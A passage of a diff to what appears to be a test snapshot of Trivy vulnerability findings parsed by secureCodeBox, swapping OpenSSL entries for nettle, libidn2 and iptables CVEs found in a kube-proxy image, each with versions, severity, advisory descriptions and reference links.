"https://lists.debian.org/debian-lts-announce/2022/03/msg00024.html", + "value": "http://www.securityfocus.com/bid/49778", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/323SNN6ZX7PRJJWP2BUAFLPUAE42XWLZ/", + "value": "http://www.securitytracker.com/id/1029190", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GDB3GQVJPXJE7X5C5JN6JAA4XUDWD6E6/", + "value": "http://www.securitytracker.com/id?1025997", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W6K3PR542DXWLEFFMFIDMME4CWMHJRMG/", + "value": "http://www.securitytracker.com/id?1026103", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0778", + "value": "http://www.securitytracker.com/id?1026704", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0002", + "value": "http://www.ubuntu.com/usn/USN-1263-1", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2022-0014.html", + "value": "http://www.us-cert.gov/cas/techalerts/TA12-010A.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-02", + "value": "https://access.redhat.com/security/cve/CVE-2011-3389", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220321-0002/", + "value": "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_fetchmail", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220429-0005/", + "value": "https://bugzilla.novell.com/show_bug.cgi?id=719047", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213255", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=737506", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213256", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-556833.pdf", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213257", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5328-1", + "value": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-006", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5328-2", + "value": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03839862", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-0778", + "value": "https://hermes.opensuse.org/messages/13154861", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5103", + "value": "https://hermes.opensuse.org/messages/13155432", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20220315.txt", + "value": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://linux.oracle.com/cve/CVE-2011-3389.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://linux.oracle.com/errata/ELSA-2011-1380.html", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-06", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2011-3389", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-07", + "value": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14752", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-08", + "value": "https://ubuntu.com/security/notices/USN-1263-1", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-09", + "value": "https://www.cve.org/CVERecord?id=CVE-2011-3389", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.1.1i-r0", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2020-1971", - "installedVersion": "1.1.1g-r0", - "packageName": "libssl1.1", + "fixedVersion": "3.4.1-1+deb10u1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-20305", + "installedVersion": "3.4.1-1", + "packageName": "libhogweed4", "references": [ - "http://www.openwall.com/lists/oss-security/2021/09/14/2", - "https://access.redhat.com/security/cve/CVE-2020-1971", - "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1971", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2154ab83e14ede338d2ede9bbe5cdfce5d5a6c9e", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=f960d81215ebf3f65e03d4d5d857fb9b666d6920", - "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44676", - "https://linux.oracle.com/cve/CVE-2020-1971.html", - "https://linux.oracle.com/errata/ELSA-2021-9150.html", - "https://lists.apache.org/thread.html/r63c6f2dd363d9b514d0a4bcf624580616a679898cc14c109a49b750c@%3Cdev.tomcat.apache.org%3E", - "https://lists.apache.org/thread.html/rbb769f771711fb274e0a4acb1b5911c8aab544a6ac5e8c12d40c5143@%3Ccommits.pulsar.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2020/12/msg00020.html", - "https://lists.debian.org/debian-lts-announce/2020/12/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DGSI34Y5LQ5RYXN4M2I5ZQT65LFVDOUU/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWPSSZNZOBJU2YR6Z4TGHXKYW3YP5QG7/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-1971", - "https://security.FreeBSD.org/advisories/FreeBSD-SA-20:33.openssl.asc", - "https://security.gentoo.org/glsa/202012-13", - "https://security.netapp.com/advisory/ntap-20201218-0005/", - "https://security.netapp.com/advisory/ntap-20210513-0002/", - "https://ubuntu.com/security/notices/USN-4662-1", - "https://ubuntu.com/security/notices/USN-4745-1", - "https://www.cve.org/CVERecord?id=CVE-2020-1971", - "https://www.debian.org/security/2020/dsa-4807", - "https://www.openssl.org/news/secadv/20201208.txt", - "https://www.oracle.com//security-alerts/cpujul2021.html", - "https://www.oracle.com/security-alerts/cpuApr2021.html", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2021.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - "https://www.tenable.com/security/tns-2020-11", - "https://www.tenable.com/security/tns-2021-09", - "https://www.tenable.com/security/tns-2021-10", + "https://access.redhat.com/security/cve/CVE-2021-20305", + "https://bugzilla.redhat.com/show_bug.cgi?id=1942533", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20305", + "https://linux.oracle.com/cve/CVE-2021-20305.html", + "https://linux.oracle.com/errata/ELSA-2021-1206.html", + "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQKWVVMAIDAJ7YAA3VVO32BHLDOH2E63/", + "https://lists.lysator.liu.se/pipermail/nettle-bugs/2021/009457.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-20305", + "https://security.gentoo.org/glsa/202105-31", + "https://security.netapp.com/advisory/ntap-20211022-0002/", + "https://ubuntu.com/security/notices/USN-4906-1", + "https://www.cve.org/CVERecord?id=CVE-2021-20305", + "https://www.debian.org/security/2021/dsa-4933", ], }, "category": "Vulnerability", - "description": "The X.509 GeneralName type is a generic type for representing different types of names. One of those name types is known as EDIPartyName. OpenSSL provides a function GENERAL_NAME_cmp which compares different instances of a GENERAL_NAME to see if they are equal or not. This function behaves incorrectly when both GENERAL_NAMEs contain an EDIPARTYNAME. A NULL pointer dereference and a crash may occur leading to a possible denial of service attack. OpenSSL itself uses the GENERAL_NAME_cmp function for two purposes: 1) Comparing CRL distribution point names between an available CRL and a CRL distribution point embedded in an X509 certificate 2) When verifying that a timestamp response token signer matches the timestamp authority name (exposed via the API functions TS_RESP_verify_response and TS_RESP_verify_token) If an attacker can control both items being compared then that attacker could trigger a crash. For example if the attacker can trick a client or server into checking a malicious certificate against a malicious CRL then this may occur. Note that some applications automatically download CRLs based on a URL embedded in a certificate. This checking happens prior to the signatures on the certificate and CRL being verified. OpenSSL's s_server, s_client and verify tools have support for the "-crl_download" option which implements automatic CRL downloading and this attack has been demonstrated to work against those tools. Note that an unrelated bug means that affected versions of OpenSSL cannot parse or construct correct encodings of EDIPARTYNAME. However it is possible to construct a malformed EDIPARTYNAME that OpenSSL's parser will accept and hence trigger this attack. All OpenSSL 1.1.1 and 1.0.2 versions are affected by this issue. Other OpenSSL releases are out of support and have not been checked. Fixed in OpenSSL 1.1.1i (Affected 1.1.1-1.1.1h). Fixed in OpenSSL 1.0.2x (Affected 1.0.2-1.0.2w).", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "A flaw was found in Nettle in versions before 3.7.2, where several Nettle signature verification functions (GOST DSA, EDDSA & ECDSA) result in the Elliptic Curve Cryptography point (ECC) multiply function being called with out-of-range scalers, possibly resulting in incorrect results. This flaw allows an attacker to force an invalid signature, causing an assertion failure or possible validation. The highest threat to this vulnerability is to confidentiality, integrity, as well as system availability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "openssl: EDIPARTYNAME NULL pointer de-reference", + "name": "nettle: Out of bounds memory access in signature verification", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-1971", + "value": "https://avd.aquasec.com/nvd/cve-2021-20305", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/09/14/2", + "value": "https://access.redhat.com/security/cve/CVE-2021-20305", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-1971", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1942533", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20305", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1971", + "value": "https://linux.oracle.com/cve/CVE-2021-20305.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2154ab83e14ede338d2ede9bbe5cdfce5d5a6c9e", + "value": "https://linux.oracle.com/errata/ELSA-2021-1206.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=f960d81215ebf3f65e03d4d5d857fb9b666d6920", + "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", }, { "type": "URL", - "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44676", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQKWVVMAIDAJ7YAA3VVO32BHLDOH2E63/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-1971.html", + "value": "https://lists.lysator.liu.se/pipermail/nettle-bugs/2021/009457.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9150.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-20305", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r63c6f2dd363d9b514d0a4bcf624580616a679898cc14c109a49b750c@%3Cdev.tomcat.apache.org%3E", + "value": "https://security.gentoo.org/glsa/202105-31", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rbb769f771711fb274e0a4acb1b5911c8aab544a6ac5e8c12d40c5143@%3Ccommits.pulsar.apache.org%3E", + "value": "https://security.netapp.com/advisory/ntap-20211022-0002/", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2020/12/msg00020.html", + "value": "https://ubuntu.com/security/notices/USN-4906-1", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2020/12/msg00021.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-20305", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DGSI34Y5LQ5RYXN4M2I5ZQT65LFVDOUU/", + "value": "https://www.debian.org/security/2021/dsa-4933", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "3.4.1-1+deb10u1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3580", + "installedVersion": "3.4.1-1", + "packageName": "libhogweed4", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-3580", + "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", + "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", + "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", + "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", + "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", + "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", + "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", + "https://errata.almalinux.org/8/ALSA-2021-4451.html", + "https://errata.rockylinux.org/RLSA-2021:4451", + "https://linux.oracle.com/cve/CVE-2021-3580.html", + "https://linux.oracle.com/errata/ELSA-2022-9221.html", + "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3580", + "https://security.netapp.com/advisory/ntap-20211104-0006/", + "https://ubuntu.com/security/notices/USN-4990-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3580", + ], + }, + "category": "Vulnerability", + "description": "A flaw was found in the way nettle's RSA decryption functions handled specially crafted ciphertext. An attacker could use this flaw to provide a manipulated ciphertext leading to application crash and denial of service.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "nettle: Remote crash in RSA decryption via manipulated ciphertext", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWPSSZNZOBJU2YR6Z4TGHXKYW3YP5QG7/", + "value": "https://avd.aquasec.com/nvd/cve-2021-3580", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-1971", + "value": "https://access.redhat.com/security/cve/CVE-2021-3580", }, { "type": "URL", - "value": "https://security.FreeBSD.org/advisories/FreeBSD-SA-20:33.openssl.asc", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202012-13", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20201218-0005/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210513-0002/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4662-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4745-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-1971", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", }, { "type": "URL", - "value": "https://www.debian.org/security/2020/dsa-4807", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20201208.txt", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", }, { "type": "URL", - "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", + "value": "https://errata.almalinux.org/8/ALSA-2021-4451.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://errata.rockylinux.org/RLSA-2021:4451", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2021.html", + "value": "https://linux.oracle.com/cve/CVE-2021-3580.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://linux.oracle.com/errata/ELSA-2022-9221.html", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2020-11", + "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-09", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3580", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-10", + "value": "https://security.netapp.com/advisory/ntap-20211104-0006/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-4990-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3580", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1j-r0", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-23841", - "installedVersion": "1.1.1g-r0", - "packageName": "libssl1.1", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-12290", + "installedVersion": "2.0.5-1+deb10u1", + "packageName": "libidn2-0", "references": [ - "http://seclists.org/fulldisclosure/2021/May/67", - "http://seclists.org/fulldisclosure/2021/May/68", - "http://seclists.org/fulldisclosure/2021/May/70", - "https://access.redhat.com/security/cve/CVE-2021-23841", - "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23841", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=122a19ab48091c657f7cb1fb3af9fc07bd557bbf", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8252ee4d90f3f2004d3d0aeeed003ad49c9a7807", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", - "https://github.com/advisories/GHSA-84rm-qf37-fgc2", - "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", - "https://linux.oracle.com/cve/CVE-2021-23841.html", - "https://linux.oracle.com/errata/ELSA-2021-9561.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-23841", - "https://rustsec.org/advisories/RUSTSEC-2021-0058", - "https://rustsec.org/advisories/RUSTSEC-2021-0058.html", - "https://security.gentoo.org/glsa/202103-03", - "https://security.netapp.com/advisory/ntap-20210219-0009/", - "https://security.netapp.com/advisory/ntap-20210513-0002/", - "https://support.apple.com/kb/HT212528", - "https://support.apple.com/kb/HT212529", - "https://support.apple.com/kb/HT212534", - "https://ubuntu.com/security/notices/USN-4738-1", - "https://ubuntu.com/security/notices/USN-4745-1", - "https://www.cve.org/CVERecord?id=CVE-2021-23841", - "https://www.debian.org/security/2021/dsa-4855", - "https://www.openssl.org/news/secadv/20210216.txt", - "https://www.oracle.com//security-alerts/cpujul2021.html", - "https://www.oracle.com/security-alerts/cpuApr2021.html", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - "https://www.tenable.com/security/tns-2021-03", - "https://www.tenable.com/security/tns-2021-09", + "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00008.html", + "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00009.html", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12290", + "https://gitlab.com/libidn/libidn2/commit/241e8f486134793cb0f4a5b0e5817a97883401f5", + "https://gitlab.com/libidn/libidn2/commit/614117ef6e4c60e1950d742e3edf0a0ef8d389de", + "https://gitlab.com/libidn/libidn2/merge_requests/71", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3UFT76Y7OSGPZV3EBEHD6ISVUM3DLARM/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KXDKYWFV6N2HHVSE67FFDM7G3FEL2ZNE/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ONG3GJRRJO35COPGVJXXSZLU4J5Y42AT/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RSI4TI2JTQWQ3YEUX5X36GTVGKO4QKZ5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U6ZXL2RDNQRAHCMKWPOMJFKYJ344X4HL/", + "https://security.gentoo.org/glsa/202003-63", + "https://ubuntu.com/security/notices/USN-4168-1", + "https://usn.ubuntu.com/4168-1/", ], }, "category": "Vulnerability", - "description": "The OpenSSL public API function X509_issuer_and_serial_hash() attempts to create a unique hash value based on the issuer and serial number data contained within an X509 certificate. However it fails to correctly handle any errors that may occur while parsing the issuer field (which might occur if the issuer field is maliciously constructed). This may subsequently result in a NULL pointer deref and a crash leading to a potential denial of service attack. The function X509_issuer_and_serial_hash() is never directly called by OpenSSL itself so applications are only vulnerable if they use this function directly and they use it on certificates that may have been obtained from untrusted sources. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x).", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "GNU libidn2 before 2.2.0 fails to perform the roundtrip checks specified in RFC3490 Section 4.2 when converting A-labels to U-labels. This makes it possible in some circumstances for one domain to impersonate another. By creating a malicious domain that matches a target domain except for the inclusion of certain punycoded Unicode characters (that would be discarded when converted first to a Unicode label and then back to an ASCII label), arbitrary domains can be impersonated.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "openssl: NULL pointer dereference in X509_issuer_and_serial_hash()", + "name": "GNU libidn2 before 2.2.0 fails to perform the roundtrip checks specifi ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-23841", + "value": "https://avd.aquasec.com/nvd/cve-2019-12290", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2021/May/67", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00008.html", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2021/May/68", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00009.html", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2021/May/70", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12290", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-23841", + "value": "https://gitlab.com/libidn/libidn2/commit/241e8f486134793cb0f4a5b0e5817a97883401f5", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", + "value": "https://gitlab.com/libidn/libidn2/commit/614117ef6e4c60e1950d742e3edf0a0ef8d389de", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23841", + "value": "https://gitlab.com/libidn/libidn2/merge_requests/71", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=122a19ab48091c657f7cb1fb3af9fc07bd557bbf", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3UFT76Y7OSGPZV3EBEHD6ISVUM3DLARM/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KXDKYWFV6N2HHVSE67FFDM7G3FEL2ZNE/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8252ee4d90f3f2004d3d0aeeed003ad49c9a7807", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ONG3GJRRJO35COPGVJXXSZLU4J5Y42AT/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RSI4TI2JTQWQ3YEUX5X36GTVGKO4QKZ5/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U6ZXL2RDNQRAHCMKWPOMJFKYJ344X4HL/", + }, + { + "type": "URL", + "value": "https://security.gentoo.org/glsa/202003-63", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-4168-1", + }, + { + "type": "URL", + "value": "https://usn.ubuntu.com/4168-1/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2012-2663", + "installedVersion": "1.8.5-3~bpo10+1", + "packageName": "libip4tc2", + "references": [ + "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "https://access.redhat.com/security/cve/CVE-2012-2663", + "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "https://www.cve.org/CVERecord?id=CVE-2012-2663", + ], + }, + "category": "Vulnerability", + "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "iptables: --syn flag bypass", + "references": [ { "type": "URL", - "value": "https://github.com/advisories/GHSA-84rm-qf37-fgc2", + "value": "https://avd.aquasec.com/nvd/cve-2012-2663", }, { "type": "URL", - "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", + "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-23841.html", + "value": "https://access.redhat.com/security/cve/CVE-2012-2663", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9561.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-23841", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0058", + "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-11360", + "installedVersion": "1.8.5-3~bpo10+1", + "packageName": "libip4tc2", + "references": [ + "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", + "https://access.redhat.com/security/cve/CVE-2019-11360", + "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", + "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", + "https://www.cve.org/CVERecord?id=CVE-2019-11360", + ], + }, + "category": "Vulnerability", + "description": "A buffer overflow in iptables-restore in netfilter iptables 1.8.2 allows an attacker to (at least) crash the program or potentially gain code execution via a specially crafted iptables-save file. This is related to add_param_to_argv in xshared.c.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "iptables: buffer overflow in iptables-restore", + "references": [ { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0058.html", + "value": "https://avd.aquasec.com/nvd/cve-2019-11360", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202103-03", + "value": "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210219-0009/", + "value": "https://access.redhat.com/security/cve/CVE-2019-11360", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210513-0002/", + "value": "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT212528", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", }, { "type": 